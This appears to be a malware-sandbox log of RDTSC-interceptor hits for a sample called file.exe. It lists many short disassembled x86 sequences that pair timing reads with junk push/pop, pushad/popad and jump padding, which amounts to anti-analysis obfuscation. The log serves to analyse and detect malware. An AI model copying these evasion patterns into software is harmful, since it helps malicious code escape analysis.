Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26DC5 second address: D26E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F1674F90E18h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 adc edx, 27F37600h 0x0000002c mov edx, dword ptr [ebp+122D3200h] 0x00000032 mov edi, 4AE75881h 0x00000037 mov ebx, dword ptr [ebp+12487FDFh] 0x0000003d mov dl, ah 0x0000003f add eax, ebx 0x00000041 push esi 0x00000042 cld 0x00000043 pop ecx 0x00000044 movsx ecx, si 0x00000047 nop 0x00000048 jne 00007F1674F90E2Eh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007F1674F90E25h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E4F second address: D26ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1675279DA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1675279DA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 clc 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F1675279DA8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 call 00007F1675279DAEh 0x0000004b pop edx 0x0000004c mov cx, di 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1675279DB7h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26ECE second address: D26ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D77A4E second address: D77A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D35D second address: D7D36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1674F90E16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D36D second address: D7D371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D371 second address: D7D38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D92A second address: D7D934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1675279DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D934 second address: D7D93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DEF5 second address: D7DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DEFD second address: D7DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DF03 second address: D7DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DF0A second address: D7DF11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DF11 second address: D7DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jbe 00007F1675279DA6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E575 second address: D7E57C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E57C second address: D7E59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E59F second address: D7E5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CA6 second address: D84CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jng 00007F1675279DA6h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CB6 second address: D84CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CBC second address: D84CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CC2 second address: D84CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CC6 second address: D84CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DB4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD8444 second address: CD844C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD844C second address: CD8454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87E8B second address: D87E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87E96 second address: D87E9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87E9B second address: D87EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1674F90E16h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88007 second address: D8800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88152 second address: D88156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88156 second address: D8815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8815A second address: D8816D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8816D second address: D88173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88173 second address: D88177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D882CB second address: D882CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D882CF second address: D882F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8849F second address: D884C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1675279DB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D884C3 second address: D884C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88623 second address: D8862E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8862E second address: D88633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88633 second address: D88639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88639 second address: D8863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8863F second address: D8864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8864B second address: D88664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F1674F90E16h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push edi 0x00000010 jno 00007F1674F90E16h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88664 second address: D88674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9199D second address: D919A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D919A3 second address: D919A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D919A9 second address: D919B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9204D second address: D9207E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1675279DB2h 0x00000010 pop eax 0x00000011 jno 00007F1675279DA8h 0x00000017 popad 0x00000018 jp 00007F1675279DC8h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9207E second address: D92082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92082 second address: D9208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9208C second address: D92090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92090 second address: D92094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D921B2 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D921B8 second address: D921D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D925E5 second address: D925F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D925F7 second address: D9262E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 jo 00007F1675279DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F1675279DADh 0x0000001c popad 0x0000001d pushad 0x0000001e jbe 00007F1675279DA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9262E second address: D92645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E1Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92645 second address: D9264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9264B second address: D9265A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92E82 second address: D92ECC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DB1h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 jo 00007F1675279DA6h 0x0000001e jmp 00007F1675279DB1h 0x00000023 jmp 00007F1675279DADh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D914CC second address: D914D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D914D0 second address: D914D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D914D6 second address: D914DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96CBC second address: D96CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC37 second address: D9DC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC3B second address: D9DC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC3F second address: D9DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1674F90E22h 0x00000012 jg 00007F1674F90E16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC72 second address: D9DC7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC7D second address: D9DC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8245 second address: DA8263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB4h 0x00000009 jne 00007F1675279DA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACA34 second address: DACA39 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACA39 second address: DACA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF53D second address: DAF556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF556 second address: DAF56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAEF5C second address: DAEF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E22h 0x00000009 popad 0x0000000a jmp 00007F1674F90E26h 0x0000000f jmp 00007F1674F90E20h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB15A6 second address: DB15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB15AC second address: DB15B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB118E second address: DB11AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1675279DB9h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8388 second address: DB83A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F1674F90E21h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBA6BE second address: DBA6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBF0CC second address: DBF0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBEF89 second address: DBEFAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F1675279DB0h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBEFAA second address: DBEFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC38CB second address: DC38CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC38CF second address: DC38D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA632 second address: DCA637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA637 second address: DCA644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA8F7 second address: DCA913 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DA6h 0x00000008 jmp 00007F1675279DAFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA913 second address: DCA93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1674F90E1Dh 0x0000000a pushad 0x0000000b jmp 00007F1674F90E24h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA93C second address: DCA942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA942 second address: DCA94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAAD0 second address: DCAAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAAD4 second address: DCAB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1674F90E28h 0x0000000e pop edi 0x0000000f push ebx 0x00000010 jne 00007F1674F90E18h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAB18 second address: DCAB1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAE0A second address: DCAE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAF8F second address: DCAF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE4A9 second address: DCE4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007F1674F90E16h 0x00000010 pop edi 0x00000011 rdtsc
